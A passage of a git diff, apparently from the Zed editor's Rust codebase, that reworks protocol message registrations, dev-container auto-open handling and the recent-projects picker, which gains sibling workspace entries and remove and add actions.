b/crates/proto/src/error.rs index d83b0fc499ba9dddb1d6417307fea9eaed9fdfd7..f551e8c3fc4d7023f5d9d43c3dc6eb51ffe2bb46 100644 --- a/crates/proto/src/error.rs +++ b/crates/proto/src/error.rs @@ -159,6 +159,12 @@ 
pub struct RpcError { /// in the app; however it is useful for chaining .message() and .with_tag() on /// ErrorCode. impl RpcError { + /// Returns the raw server-provided error message without any RPC framing + /// (e.g. without the "RPC request X failed: " prefix that `Display` adds). + pub fn raw_message(&self) -> &str { + &self.msg + } + /// from_proto converts a crate::Error into an anyhow::Error containing /// an RpcError. pub fn from_proto(error: &crate::Error, request: &str) -> anyhow::Error { diff --git a/crates/proto/src/proto.rs b/crates/proto/src/proto.rs index 3d30551557000c305a82b328828b566c9d78f75e..b77bd02313c13a9b04eb7762a97f9e77ac8cbaf8 100644 --- a/crates/proto/src/proto.rs +++ b/crates/proto/src/proto.rs @@ -32,7 +32,6 @@ messages!( (AddProjectCollaborator, Foreground), (AddWorktree, Foreground), (AddWorktreeResponse, Foreground), - (AdvertiseContexts, Foreground), (AllocateWorktreeId, Foreground), (AllocateWorktreeIdResponse, Foreground), (ApplyCodeAction, Background), @@ -58,8 +57,6 @@ messages!( (CreateFileForPeer, Foreground), (CreateChannel, Foreground), (CreateChannelResponse, Foreground), - (CreateContext, Foreground), - (CreateContextResponse, Foreground), (CreateProjectEntry, Foreground), (CreateRoom, Foreground), (CreateRoomResponse, Foreground), @@ -191,8 +188,6 @@ messages!( (OpenBufferResponse, Background), (OpenImageResponse, Background), (OpenCommitMessageBuffer, Background), - (OpenContext, Foreground), - (OpenContextResponse, Foreground), (OpenNewBuffer, Foreground), (OpenServerSettings, Foreground), (PerformRename, Background), @@ -258,8 +253,6 @@ messages!( (ToggleBreakpoint, Foreground), (SynchronizeBuffers, Foreground), (SynchronizeBuffersResponse, Foreground), - (SynchronizeContexts, Foreground), - (SynchronizeContextsResponse, Foreground), (TaskContext, Background), (TaskContextForLocation, Background), (Test, Foreground), @@ -278,7 +271,6 @@ messages!( (UpdateChannelMessage, Foreground), (UpdateChannels, Foreground), 
(UpdateContacts, Foreground), - (UpdateContext, Foreground), (UpdateDiagnosticSummary, Foreground), (UpdateDiffBases, Foreground), (UpdateFollowers, Foreground), @@ -302,6 +294,13 @@ messages!( (GitCommitDetails, Background), (GitFileHistory, Background), (GitFileHistoryResponse, Background), + (GitCreateCheckpoint, Background), + (GitCreateCheckpointResponse, Background), + (GitRestoreCheckpoint, Background), + (GitCompareCheckpoints, Background), + (GitCompareCheckpointsResponse, Background), + (GitDiffCheckpoints, Background), + (GitDiffCheckpointsResponse, Background), (SetIndexText, Background), (Push, Background), (Fetch, Background), @@ -322,8 +321,6 @@ messages!( (CheckForPushedCommitsResponse, Background), (GitDiff, Background), (GitDiffResponse, Background), - (GitDiffStat, Background), - (GitDiffStatResponse, Background), (GitInit, Background), (GetDebugAdapterBinary, Background), (DebugAdapterBinary, Background), @@ -354,8 +351,12 @@ messages!( (NewExternalAgentVersionAvailable, Background), (RemoteStarted, Background), (GitGetWorktrees, Background), + (GitGetHeadSha, Background), + (GitGetHeadShaResponse, Background), (GitWorktreesResponse, Background), (GitCreateWorktree, Background), + (GitRemoveWorktree, Background), + (GitRenameWorktree, Background), (ShareAgentThread, Foreground), (GetSharedAgentThread, Foreground), (GetSharedAgentThreadResponse, Foreground), @@ -496,9 +497,6 @@ request_messages!( (LspQueryResponse, Ack), (RestartLanguageServers, Ack), (StopLanguageServers, Ack), - (OpenContext, OpenContextResponse), - (CreateContext, CreateContextResponse), - (SynchronizeContexts, SynchronizeContextsResponse), (LspExtSwitchSourceHeader, LspExtSwitchSourceHeaderResponse), (LspExtGoToParentModule, LspExtGoToParentModuleResponse), (LspExtCancelFlycheck, Ack), @@ -525,6 +523,10 @@ request_messages!( (RegisterBufferWithLanguageServers, Ack), (GitShow, GitCommitDetails), (GitFileHistory, GitFileHistoryResponse), + (GitCreateCheckpoint, 
GitCreateCheckpointResponse), + (GitRestoreCheckpoint, Ack), + (GitCompareCheckpoints, GitCompareCheckpointsResponse), + (GitDiffCheckpoints, GitDiffCheckpointsResponse), (GitReset, Ack), (GitDeleteBranch, Ack), (GitCheckoutFiles, Ack), @@ -541,7 +543,6 @@ request_messages!( (GitRenameBranch, Ack), (CheckForPushedCommits, CheckForPushedCommitsResponse), (GitDiff, GitDiffResponse), - (GitDiffStat, GitDiffStatResponse), (GitInit, Ack), (ToggleBreakpoint, Ack), (GetDebugAdapterBinary, DebugAdapterBinary), @@ -559,7 +560,10 @@ request_messages!( (GetContextServerCommand, ContextServerCommand), (RemoteStarted, Ack), (GitGetWorktrees, GitWorktreesResponse), + (GitGetHeadSha, GitGetHeadShaResponse), (GitCreateWorktree, Ack), + (GitRemoveWorktree, Ack), + (GitRenameWorktree, Ack), (TrustWorktrees, Ack), (RestrictWorktrees, Ack), (FindSearchCandidatesChunk, Ack), @@ -683,11 +687,6 @@ entity_messages!( LspExtExpandMacro, LspExtOpenDocs, LspExtRunnables, - AdvertiseContexts, - OpenContext, - CreateContext, - UpdateContext, - SynchronizeContexts, LspExtSwitchSourceHeader, LspExtGoToParentModule, LspExtCancelFlycheck, @@ -711,6 +710,10 @@ entity_messages!( RegisterBufferWithLanguageServers, GitShow, GitFileHistory, + GitCreateCheckpoint, + GitRestoreCheckpoint, + GitCompareCheckpoints, + GitDiffCheckpoints, GitReset, GitDeleteBranch, GitCheckoutFiles, @@ -730,7 +733,6 @@ entity_messages!( GitRemoveRemote, CheckForPushedCommits, GitDiff, - GitDiffStat, GitInit, BreakpointsForFile, ToggleBreakpoint, @@ -750,7 +752,10 @@ entity_messages!( ExternalAgentLoadingStatusUpdated, NewExternalAgentVersionAvailable, GitGetWorktrees, + GitGetHeadSha, GitCreateWorktree, + GitRemoveWorktree, + GitRenameWorktree, TrustWorktrees, RestrictWorktrees, FindSearchCandidatesChunk, @@ -880,6 +885,7 @@ pub fn split_worktree_update(mut message: UpdateWorktree) -> impl Iterator String { } pub fn suggest_on_worktree_updated( + workspace: &mut Workspace, worktree_id: WorktreeId, updated_entries: 
&UpdatedEntriesSet, project: &gpui::Entity, window: &mut Window, cx: &mut Context, ) { + let cli_auto_open = workspace.open_in_dev_container(); + let devcontainer_updated = updated_entries.iter().any(|(path, _, _)| { path.as_ref() == devcontainer_dir_path() || path.as_ref() == devcontainer_json_path() }); - if !devcontainer_updated { + if !devcontainer_updated && !cli_auto_open { return; } @@ -53,7 +57,35 @@ pub fn suggest_on_worktree_updated( return; } - if find_configs_in_snapshot(worktree).is_empty() { + let has_configs = !find_configs_in_snapshot(worktree).is_empty(); + + if cli_auto_open { + workspace.set_open_in_dev_container(false); + let task = cx.spawn_in(window, async move |workspace, cx| { + let scans_complete = + workspace.update(cx, |workspace, cx| workspace.worktree_scans_complete(cx))?; + scans_complete.await; + + workspace.update_in(cx, |workspace, window, cx| { + let has_configs = workspace + .project() + .read(cx) + .worktrees(cx) + .any(|wt| !find_configs_in_snapshot(wt.read(cx)).is_empty()); + if has_configs { + cx.on_next_frame(window, move |_workspace, window, cx| { + window.dispatch_action(Box::new(zed_actions::OpenDevContainer), cx); + }); + } else { + log::warn!("--dev-container: no devcontainer configuration found in project"); + } + }) + }); + workspace.set_dev_container_task(task); + return; + } + + if !has_configs { return; } @@ -61,7 +93,7 @@ pub fn suggest_on_worktree_updated( let project_path = abs_path.to_string_lossy().to_string(); let key_for_dismiss = project_devcontainer_key(&project_path); - let already_dismissed = KEY_VALUE_STORE + let already_dismissed = KeyValueStore::global(cx) .read_kvp(&key_for_dismiss) .ok() .flatten() @@ -98,9 +130,13 @@ pub fn suggest_on_worktree_updated( .secondary_on_click({ move |_window, cx| { let key = key_for_dismiss.clone(); - db::write_and_log(cx, move || { - KEY_VALUE_STORE.write_kvp(key, "dismissed".to_string()) - }); + let kvp = KeyValueStore::global(cx); + cx.background_spawn(async move { + 
kvp.write_kvp(key, "dismissed".to_string()) + .await + .log_err(); + }) + .detach(); } }) }) diff --git a/crates/recent_projects/src/disconnected_overlay.rs b/crates/recent_projects/src/disconnected_overlay.rs index 82ff0699054e5614b8078d3223d5e9282e5034b5..e78762eb283160f84b163771b9835188d2ffce4a 100644 --- a/crates/recent_projects/src/disconnected_overlay.rs +++ b/crates/recent_projects/src/disconnected_overlay.rs @@ -2,11 +2,7 @@ use gpui::{ClickEvent, DismissEvent, EventEmitter, FocusHandle, Focusable, Rende use project::project_settings::ProjectSettings; use remote::RemoteConnectionOptions; use settings::Settings; -use ui::{ - Button, ButtonCommon, ButtonStyle, Clickable, Context, ElevationIndex, FluentBuilder, Headline, - HeadlineSize, IconName, IconPosition, InteractiveElement, IntoElement, Label, Modal, - ModalFooter, ModalHeader, ParentElement, Section, Styled, StyledExt, Window, div, h_flex, rems, -}; +use ui::{ElevationIndex, Modal, ModalFooter, ModalHeader, Section, prelude::*}; use workspace::{ ModalView, MultiWorkspace, OpenOptions, Workspace, notifications::DetachAndPromptErr, }; @@ -129,7 +125,7 @@ impl DisconnectedOverlay { paths, app_state, OpenOptions { - replace_window: Some(window_handle), + requesting_window: Some(window_handle), ..Default::default() }, cx, @@ -207,8 +203,7 @@ impl Render for DisconnectedOverlay { Button::new("reconnect", "Reconnect") .style(ButtonStyle::Filled) .layer(ElevationIndex::ModalSurface) - .icon(IconName::ArrowCircle) - .icon_position(IconPosition::Start) + .start_icon(Icon::new(IconName::ArrowCircle)) .on_click(cx.listener(Self::handle_reconnect)), ) }), diff --git a/crates/recent_projects/src/recent_projects.rs b/crates/recent_projects/src/recent_projects.rs index 110a702437d463d6f296510c8f4a3a68d28d7d60..e3bfc0dc08c95c0ce57b818e50965433a6c6bc98 100644 --- a/crates/recent_projects/src/recent_projects.rs +++ b/crates/recent_projects/src/recent_projects.rs @@ -2,9 +2,11 @@ mod dev_container_suggest; pub mod 
disconnected_overlay; mod remote_connections; mod remote_servers; +pub mod sidebar_recent_projects; mod ssh_config; use std::{ + collections::HashSet, path::{Path, PathBuf}, sync::Arc, }; @@ -44,13 +46,16 @@ use ui::{ }; use util::{ResultExt, paths::PathExt}; use workspace::{ - HistoryManager, ModalView, MultiWorkspace, OpenOptions, OpenVisible, PathList, - SerializedWorkspaceLocation, WORKSPACE_DB, Workspace, WorkspaceId, + HistoryManager, ModalView, MultiWorkspace, OpenMode, OpenOptions, OpenVisible, PathList, + SerializedWorkspaceLocation, Workspace, WorkspaceDb, WorkspaceId, notifications::DetachAndPromptErr, with_active_or_new_workspace, }; use zed_actions::{OpenDevContainer, OpenRecent, OpenRemote}; -actions!(recent_projects, [ToggleActionsMenu]); +actions!( + recent_projects, + [ToggleActionsMenu, RemoveSelected, AddToWorkspace,] +); #[derive(Clone, Debug)] pub struct RecentProjectEntry { @@ -74,6 +79,7 @@ struct OpenFolderEntry { enum ProjectPickerEntry { Header(SharedString), OpenFolder { index: usize, positions: Vec }, + OpenProject(StringMatch), RecentProject(StringMatch), } @@ -87,8 +93,9 @@ pub async fn get_recent_projects( current_workspace_id: Option, limit: Option, fs: Arc, + db: &WorkspaceDb, ) -> Vec { - let workspaces = WORKSPACE_DB + let workspaces = db .recent_workspaces_on_disk(fs.as_ref()) .await .unwrap_or_default(); @@ -137,8 +144,8 @@ pub async fn get_recent_projects( } } -pub async fn delete_recent_project(workspace_id: WorkspaceId) { - let _ = WORKSPACE_DB.delete_workspace_by_id(workspace_id).await; +pub async fn delete_recent_project(workspace_id: WorkspaceId, db: &WorkspaceDb) { + let _ = db.delete_workspace_by_id(workspace_id).await; } fn get_open_folders(workspace: &Workspace, cx: &App) -> Vec { @@ -198,17 +205,19 @@ fn get_branch_for_worktree( cx: &App, ) -> Option { let worktree_abs_path = worktree.abs_path(); - for repo in repositories { - let repo = repo.read(cx); - if repo.work_directory_abs_path == worktree_abs_path - || 
worktree_abs_path.starts_with(&*repo.work_directory_abs_path) - { - if let Some(branch) = &repo.branch { - return Some(SharedString::from(branch.name().to_string())); - } - } - } - None + repositories + .iter() + .filter(|repo| { + let repo_path = &repo.read(cx).work_directory_abs_path; + *repo_path == worktree_abs_path || worktree_abs_path.starts_with(repo_path.as_ref()) + }) + .max_by_key(|repo| repo.read(cx).work_directory_abs_path.as_os_str().len()) + .and_then(|repo| { + repo.read(cx) + .branch + .as_ref() + .map(|branch| SharedString::from(branch.name().to_string())) + }) } pub fn init(cx: &mut App) { @@ -256,13 +265,13 @@ pub fn init(cx: &mut App) { user: None, }); - let replace_window = match create_new_window { + let requesting_window = match create_new_window { false => window_handle, true => None, }; let open_options = workspace::OpenOptions { - replace_window, + requesting_window, ..Default::default() }; @@ -315,7 +324,7 @@ pub fn init(cx: &mut App) { let fs = workspace.project().read(cx).fs().clone(); add_wsl_distro(fs, &open_wsl.distro, cx); let open_options = OpenOptions { - replace_window: window.window_handle().downcast::(), + requesting_window: window.window_handle().downcast::(), ..Default::default() }; @@ -337,19 +346,70 @@ pub fn init(cx: &mut App) { cx.on_action(|open_recent: &OpenRecent, cx| { let create_new_window = open_recent.create_new_window; - with_active_or_new_workspace(cx, move |workspace, window, cx| { - let Some(recent_projects) = workspace.active_modal::(cx) else { - let focus_handle = workspace.focus_handle(cx); - RecentProjects::open(workspace, create_new_window, window, focus_handle, cx); - return; - }; - recent_projects.update(cx, |recent_projects, cx| { - recent_projects - .picker - .update(cx, |picker, cx| picker.cycle_selection(window, cx)) - }); - }); + match cx + .active_window() + .and_then(|w| w.downcast::()) + { + Some(multi_workspace) => { + cx.defer(move |cx| { + multi_workspace + .update(cx, |multi_workspace, 
window, cx| { + let sibling_workspace_ids: HashSet = multi_workspace + .workspaces() + .filter_map(|ws| ws.read(cx).database_id()) + .collect(); + + let workspace = multi_workspace.workspace().clone(); + workspace.update(cx, |workspace, cx| { + let Some(recent_projects) = + workspace.active_modal::(cx) + else { + let focus_handle = workspace.focus_handle(cx); + RecentProjects::open( + workspace, + create_new_window, + sibling_workspace_ids, + window, + focus_handle, + cx, + ); + return; + }; + + recent_projects.update(cx, |recent_projects, cx| { + recent_projects + .picker + .update(cx, |picker, cx| picker.cycle_selection(window, cx)) + }); + }); + }) + .log_err(); + }); + } + None => { + with_active_or_new_workspace(cx, move |workspace, window, cx| { + let Some(recent_projects) = workspace.active_modal::(cx) else { + let focus_handle = workspace.focus_handle(cx); + RecentProjects::open( + workspace, + create_new_window, + HashSet::new(), + window, + focus_handle, + cx, + ); + return; + }; + + recent_projects.update(cx, |recent_projects, cx| { + recent_projects + .picker + .update(cx, |picker, cx| picker.cycle_selection(window, cx)) + }); + }); + } + } }); cx.on_action(|open_remote: &OpenRemote, cx| { let from_existing_connection = open_remote.from_existing_connection; @@ -414,11 +474,12 @@ pub fn init(cx: &mut App) { cx.subscribe_in( workspace.project(), window, - move |_, project, event, window, cx| { + move |workspace, project, event, window, cx| { if let project::Event::WorktreeUpdatedEntries(worktree_id, updated_entries) = event { dev_container_suggest::suggest_on_worktree_updated( + workspace, *worktree_id, updated_entries, project, @@ -469,7 +530,7 @@ pub fn add_wsl_distro( pub struct RecentProjects { pub picker: Entity>, rem_width: f32, - _subscription: Subscription, + _subscriptions: Vec, } impl ModalView for RecentProjects { @@ -493,6 +554,7 @@ impl RecentProjects { window: &mut Window, cx: &mut Context, ) -> Self { + let style = delegate.style; let 
picker = cx.new(|cx| { Picker::list(delegate, window, cx) .list_measure_all() @@ -504,16 +566,32 @@ impl RecentProjects { picker.delegate.focus_handle = picker_focus_handle; }); - let _subscription = cx.subscribe(&picker, |_, _, _, cx| cx.emit(DismissEvent)); + let mut subscriptions = vec![cx.subscribe(&picker, |_, _, _, cx| cx.emit(DismissEvent))]; + + if style == ProjectPickerStyle::Popover { + let picker_focus = picker.focus_handle(cx); + subscriptions.push( + cx.on_focus_out(&picker_focus, window, |this, _, window, cx| { + let submenu_focused = this.picker.update(cx, |picker, cx| { + picker.delegate.actions_menu_handle.is_focused(window, cx) + }); + if !submenu_focused { + cx.emit(DismissEvent); + } + }), + ); + } // We do not want to block the UI on a potentially lengthy call to DB, so we're gonna swap // out workspace locations once the future runs to completion. + let db = WorkspaceDb::global(cx); cx.spawn_in(window, async move |this, cx| { let Some(fs) = fs else { return }; - let workspaces = WORKSPACE_DB + let workspaces = db .recent_workspaces_on_disk(fs.as_ref()) .await .log_err() .unwrap_or_default(); + let workspaces = workspace::resolve_worktree_workspaces(workspaces, fs.as_ref()).await; this.update_in(cx, move |this, window, cx| { this.picker.update(cx, move |picker, cx| { picker.delegate.set_workspaces(workspaces); @@ -526,13 +604,14 @@ impl RecentProjects { Self { picker, rem_width, - _subscription, + _subscriptions: subscriptions, } } pub fn open( workspace: &mut Workspace, create_new_window: bool, + sibling_workspace_ids: HashSet, window: &mut Window, focus_handle: FocusHandle, cx: &mut Context, @@ -541,12 +620,14 @@ impl RecentProjects { let open_folders = get_open_folders(workspace, cx); let project_connection_options = workspace.project().read(cx).remote_connection_options(cx); let fs = Some(workspace.app_state().fs.clone()); + workspace.toggle_modal(window, cx, |window, cx| { let delegate = RecentProjectsDelegate::new( weak, 
create_new_window, focus_handle, open_folders, + sibling_workspace_ids, project_connection_options, ProjectPickerStyle::Modal, ); @@ -557,6 +638,7 @@ impl RecentProjects { pub fn popover( workspace: WeakEntity, + sibling_workspace_ids: HashSet, create_new_window: bool, focus_handle: FocusHandle, window: &mut Window, @@ -580,6 +662,7 @@ impl RecentProjects { create_new_window, focus_handle, open_folders, + sibling_workspace_ids, project_connection_options, ProjectPickerStyle::Popover, ); @@ -604,6 +687,79 @@ impl RecentProjects { } }); } + + fn handle_remove_selected( + &mut self, + _: &RemoveSelected, + window: &mut Window, + cx: &mut Context, + ) { + self.picker.update(cx, |picker, cx| { + let ix = picker.delegate.selected_index; + + match picker.delegate.filtered_entries.get(ix) { + Some(ProjectPickerEntry::OpenFolder { index, .. }) => { + if let Some(folder) = picker.delegate.open_folders.get(*index) { + let worktree_id = folder.worktree_id; + let Some(workspace) = picker.delegate.workspace.upgrade() else { + return; + }; + workspace.update(cx, |workspace, cx| { + let project = workspace.project().clone(); + project.update(cx, |project, cx| { + project.remove_worktree(worktree_id, cx); + }); + }); + picker.delegate.open_folders = get_open_folders(workspace.read(cx), cx); + let query = picker.query(cx); + picker.update_matches(query, window, cx); + } + } + Some(ProjectPickerEntry::OpenProject(hit)) => { + if let Some((workspace_id, ..)) = + picker.delegate.workspaces.get(hit.candidate_id) + { + let workspace_id = *workspace_id; + picker + .delegate + .remove_sibling_workspace(workspace_id, window, cx); + let query = picker.query(cx); + picker.update_matches(query, window, cx); + } + } + Some(ProjectPickerEntry::RecentProject(_)) => { + picker.delegate.delete_recent_project(ix, window, cx); + } + _ => {} + } + }); + } + + fn handle_add_to_workspace( + &mut self, + _: &AddToWorkspace, + window: &mut Window, + cx: &mut Context, + ) { + self.picker.update(cx, 
|picker, cx| { + let ix = picker.delegate.selected_index; + + if let Some(ProjectPickerEntry::RecentProject(hit)) = + picker.delegate.filtered_entries.get(ix) + { + if let Some((_, location, paths, _)) = + picker.delegate.workspaces.get(hit.candidate_id) + { + if matches!(location, SerializedWorkspaceLocation::Local) { + let paths_to_add = paths.paths().to_vec(); + picker + .delegate + .add_project_to_workspace(paths_to_add, window, cx); + } + } + } + }); + } } impl EventEmitter for RecentProjects {} @@ -619,6 +775,8 @@ impl Render for RecentProjects { v_flex() .key_context("RecentProjects") .on_action(cx.listener(Self::handle_toggle_open_menu)) + .on_action(cx.listener(Self::handle_remove_selected)) + .on_action(cx.listener(Self::handle_add_to_workspace)) .w(rems(self.rem_width)) .child(self.picker.clone()) } @@ -627,6 +785,7 @@ impl Render for RecentProjects { pub struct RecentProjectsDelegate { workspace: WeakEntity, open_folders: Vec, + sibling_workspace_ids: HashSet, workspaces: Vec<( WorkspaceId, SerializedWorkspaceLocation, @@ -652,6 +811,7 @@ impl RecentProjectsDelegate { create_new_window: bool, focus_handle: FocusHandle, open_folders: Vec, + sibling_workspace_ids: HashSet, project_connection_options: Option, style: ProjectPickerStyle, ) -> Self { @@ -659,6 +819,7 @@ impl RecentProjectsDelegate { Self { workspace, open_folders, + sibling_workspace_ids, workspaces: Vec::new(), filtered_entries: Vec::new(), selected_index: 0, @@ -705,32 +866,14 @@ impl PickerDelegate for RecentProjectsDelegate { window: &mut Window, cx: &mut Context>, ) -> Div { - let focus_handle = self.focus_handle.clone(); - h_flex() .flex_none() .h_9() - .pl_2p5() - .pr_1p5() + .px_2p5() .justify_between() .border_b_1() .border_color(cx.theme().colors().border_variant) .child(editor.render(window, cx)) - .child( - IconButton::new("add_folder", IconName::Plus) - .icon_size(IconSize::Small) - .tooltip(move |_, cx| { - Tooltip::for_action_in( - "Add Project to Workspace", - 
&workspace::AddFolderToProject, - &focus_handle, - cx, - ) - }) - .on_click(|_, window, cx| { - window.dispatch_action(workspace::AddFolderToProject.boxed_clone(), cx) - }), - ) } fn match_count(&self) -> usize { @@ -750,15 +893,14 @@ impl PickerDelegate for RecentProjectsDelegate { self.selected_index = ix; } - fn can_select( - &mut self, - ix: usize, - _window: &mut Window, - _cx: &mut Context>, - ) -> bool { + fn can_select(&self, ix: usize, _window: &mut Window, _cx: &mut Context>) -> bool { matches!( self.filtered_entries.get(ix), - Some(ProjectPickerEntry::OpenFolder { .. } | ProjectPickerEntry::RecentProject(_)) + Some( + ProjectPickerEntry::OpenFolder { .. } + | ProjectPickerEntry::OpenProject(_) + | ProjectPickerEntry::RecentProject(_) + ) ) } @@ -793,6 +935,38 @@ impl PickerDelegate for RecentProjectsDelegate { )) }; + let sibling_candidates: Vec<_> = self + .workspaces + .iter() + .enumerate() + .filter(|(_, (id, _, _, _))| self.is_sibling_workspace(*id, cx)) + .map(|(id, (_, _, paths, _))| { + let combined_string = paths + .ordered_paths() + .map(|path| path.compact().to_string_lossy().into_owned()) + .collect::>() + .join(""); + StringMatchCandidate::new(id, &combined_string) + }) + .collect(); + + let mut sibling_matches = smol::block_on(fuzzy::match_strings( + &sibling_candidates, + query, + smart_case, + true, + 100, + &Default::default(), + cx.background_executor().clone(), + )); + sibling_matches.sort_unstable_by(|a, b| { + b.score + .partial_cmp(&a.score) + .unwrap_or(std::cmp::Ordering::Equal) + .then_with(|| a.candidate_id.cmp(&b.candidate_id)) + }); + + // Build candidates for recent projects (not current, not sibling, not open folder) let recent_candidates: Vec<_> = self .workspaces .iter() @@ -843,6 +1017,33 @@ impl PickerDelegate for RecentProjectsDelegate { } } + let has_siblings_to_show = if is_empty_query { + !sibling_candidates.is_empty() + } else { + !sibling_matches.is_empty() + }; + + if has_siblings_to_show { + 
entries.push(ProjectPickerEntry::Header("This Window".into())); + + if is_empty_query { + for (id, (workspace_id, _, _, _)) in self.workspaces.iter().enumerate() { + if self.is_sibling_workspace(*workspace_id, cx) { + entries.push(ProjectPickerEntry::OpenProject(StringMatch { + candidate_id: id, + score: 0.0, + positions: Vec::new(), + string: String::new(), + })); + } + } + } else { + for m in sibling_matches { + entries.push(ProjectPickerEntry::OpenProject(m)); + } + } + } + let has_recent_to_show = if is_empty_query { !recent_candidates.is_empty() } else { @@ -897,6 +1098,31 @@ impl PickerDelegate for RecentProjectsDelegate { } cx.emit(DismissEvent); } + Some(ProjectPickerEntry::OpenProject(selected_match)) => { + let Some((workspace_id, _, _, _)) = + self.workspaces.get(selected_match.candidate_id) + else { + return; + }; + let workspace_id = *workspace_id; + + if let Some(handle) = window.window_handle().downcast::() { + cx.defer(move |cx| { + handle + .update(cx, |multi_workspace, window, cx| { + let workspace = multi_workspace + .workspaces() + .find(|ws| ws.read(cx).database_id() == Some(workspace_id)) + .cloned(); + if let Some(workspace) = workspace { + multi_workspace.activate(workspace, window, cx); + } + }) + .log_err(); + }); + } + cx.emit(DismissEvent); + } Some(ProjectPickerEntry::RecentProject(selected_match)) => { let Some(workspace) = self.workspace.upgrade() else { return; @@ -930,7 +1156,12 @@ impl PickerDelegate for RecentProjectsDelegate { cx.defer(move |cx| { if let Some(task) = handle .update(cx, |multi_workspace, window, cx| { - multi_workspace.open_project(paths, window, cx) + multi_workspace.open_project( + paths, + OpenMode::Activate, + window, + cx, + ) }) .log_err() { @@ -940,7 +1171,19 @@ impl PickerDelegate for RecentProjectsDelegate { } return; } else { - workspace.open_workspace_for_paths(false, paths, window, cx) + workspace + .open_workspace_for_paths( + OpenMode::NewWindow, + paths, + window, + cx, + ) + .detach_and_prompt_err( 
+ "Failed to open project", + window, + cx, + |_, _, _| None, + ); } } SerializedWorkspaceLocation::Remote(mut connection) => { @@ -951,7 +1194,7 @@ impl PickerDelegate for RecentProjectsDelegate { None }; let open_options = OpenOptions { - replace_window, + requesting_window: replace_window, ..Default::default() }; if let RemoteConnectionOptions::Ssh(connection) = &mut connection { @@ -969,14 +1212,14 @@ impl PickerDelegate for RecentProjectsDelegate { ) .await }) + .detach_and_prompt_err( + "Failed to open project", + window, + cx, + |_, _, _| None, + ); } } - .detach_and_prompt_err( - "Failed to open project", - window, - cx, - |_, _, _| None, - ); }); cx.emit(DismissEvent); } @@ -1098,27 +1341,124 @@ impl PickerDelegate for RecentProjectsDelegate { this.tooltip(Tooltip::text(path.to_string_lossy().to_string())) }), ) - .map(|el| { - if self.selected_index == ix { - el.end_slot(secondary_actions) - } else { - el.end_hover_slot(secondary_actions) - } - }) + .end_slot(secondary_actions) + .show_end_slot_on_hover() + .into_any_element(), + ) + } + ProjectPickerEntry::OpenProject(hit) => { + let (workspace_id, location, paths, _) = self.workspaces.get(hit.candidate_id)?; + let workspace_id = *workspace_id; + let ordered_paths: Vec<_> = paths + .ordered_paths() + .map(|p| p.compact().to_string_lossy().to_string()) + .collect(); + let tooltip_path: SharedString = match &location { + SerializedWorkspaceLocation::Remote(options) => { + let host = options.display_name(); + if ordered_paths.len() == 1 { + format!("{} ({})", ordered_paths[0], host).into() + } else { + format!("{}\n({})", ordered_paths.join("\n"), host).into() + } + } + _ => ordered_paths.join("\n").into(), + }; + + let mut path_start_offset = 0; + let (match_labels, paths): (Vec<_>, Vec<_>) = paths + .ordered_paths() + .map(|p| p.compact()) + .map(|path| { + let highlighted_text = + highlights_for_path(path.as_ref(), &hit.positions, path_start_offset); + path_start_offset += highlighted_text.1.text.len(); 
+ highlighted_text + }) + .unzip(); + + let prefix = match &location { + SerializedWorkspaceLocation::Remote(options) => { + Some(SharedString::from(options.display_name())) + } + _ => None, + }; + + let highlighted_match = HighlightedMatchWithPaths { + prefix, + match_label: HighlightedMatch::join(match_labels.into_iter().flatten(), ", "), + paths, + }; + + let icon = icon_for_remote_connection(match location { + SerializedWorkspaceLocation::Local => None, + SerializedWorkspaceLocation::Remote(options) => Some(options), + }); + + let secondary_actions = h_flex() + .gap_1() + .child( + IconButton::new("remove_open_project", IconName::Close) + .icon_size(IconSize::Small) + .tooltip(Tooltip::text("Remove Project from Window")) + .on_click(cx.listener(move |picker, _, window, cx| { + cx.stop_propagation(); + window.prevent_default(); + picker + .delegate + .remove_sibling_workspace(workspace_id, window, cx); + let query = picker.query(cx); + picker.update_matches(query, window, cx); + })), + ) + .into_any_element(); + + Some( + ListItem::new(ix) + .toggle_state(selected) + .inset(true) + .spacing(ListItemSpacing::Sparse) + .child( + h_flex() + .id("open_project_info_container") + .gap_3() + .flex_grow() + .when(self.has_any_non_local_projects, |this| { + this.child(Icon::new(icon).color(Color::Muted)) + }) + .child({ + let mut highlighted = highlighted_match; + if !self.render_paths { + highlighted.paths.clear(); + } + highlighted.render(window, cx) + }) + .tooltip(Tooltip::text(tooltip_path)), + ) + .end_slot(secondary_actions) + .show_end_slot_on_hover() .into_any_element(), ) } ProjectPickerEntry::RecentProject(hit) => { - let popover_style = matches!(self.style, ProjectPickerStyle::Popover); let (_, location, paths, _) = self.workspaces.get(hit.candidate_id)?; let is_local = matches!(location, SerializedWorkspaceLocation::Local); let paths_to_add = paths.paths().to_vec(); - let tooltip_path: SharedString = paths + let ordered_paths: Vec<_> = paths .ordered_paths() 
.map(|p| p.compact().to_string_lossy().to_string()) - .collect::>() - .join("\n") - .into(); + .collect(); + let tooltip_path: SharedString = match &location { + SerializedWorkspaceLocation::Remote(options) => { + let host = options.display_name(); + if ordered_paths.len() == 1 { + format!("{} ({})", ordered_paths[0], host).into() + } else { + format!("{}\n({})", ordered_paths.join("\n"), host).into() + } + } + _ => ordered_paths.join("\n").into(), + }; let mut path_start_offset = 0; let (match_labels, paths): (Vec<_>, Vec<_>) = paths @@ -1151,9 +1491,9 @@ impl PickerDelegate for RecentProjectsDelegate { .gap_px() .when(is_local, |this| { this.child( - IconButton::new("add_to_workspace", IconName::Plus) + IconButton::new("add_to_workspace", IconName::FolderPlus) .icon_size(IconSize::Small) - .tooltip(Tooltip::text("Add Project to Workspace")) + .tooltip(Tooltip::text("Add Project to this Workspace")) .on_click({ let paths_to_add = paths_to_add.clone(); cx.listener(move |picker, _event, window, cx| { @@ -1168,28 +1508,26 @@ impl PickerDelegate for RecentProjectsDelegate { }), ) }) - .when(popover_style, |this| { - this.child( - IconButton::new("open_new_window", IconName::ArrowUpRight) - .icon_size(IconSize::XSmall) - .tooltip({ - move |_, cx| { - Tooltip::for_action_in( - "Open Project in New Window", - &menu::SecondaryConfirm, - &focus_handle, - cx, - ) - } - }) - .on_click(cx.listener(move |this, _event, window, cx| { - cx.stop_propagation(); - window.prevent_default(); - this.delegate.set_selected_index(ix, window, cx); - this.delegate.confirm(true, window, cx); - })), - ) - }) + .child( + IconButton::new("open_new_window", IconName::ArrowUpRight) + .icon_size(IconSize::XSmall) + .tooltip({ + move |_, cx| { + Tooltip::for_action_in( + "Open Project in New Window", + &menu::SecondaryConfirm, + &focus_handle, + cx, + ) + } + }) + .on_click(cx.listener(move |this, _event, window, cx| { + cx.stop_propagation(); + 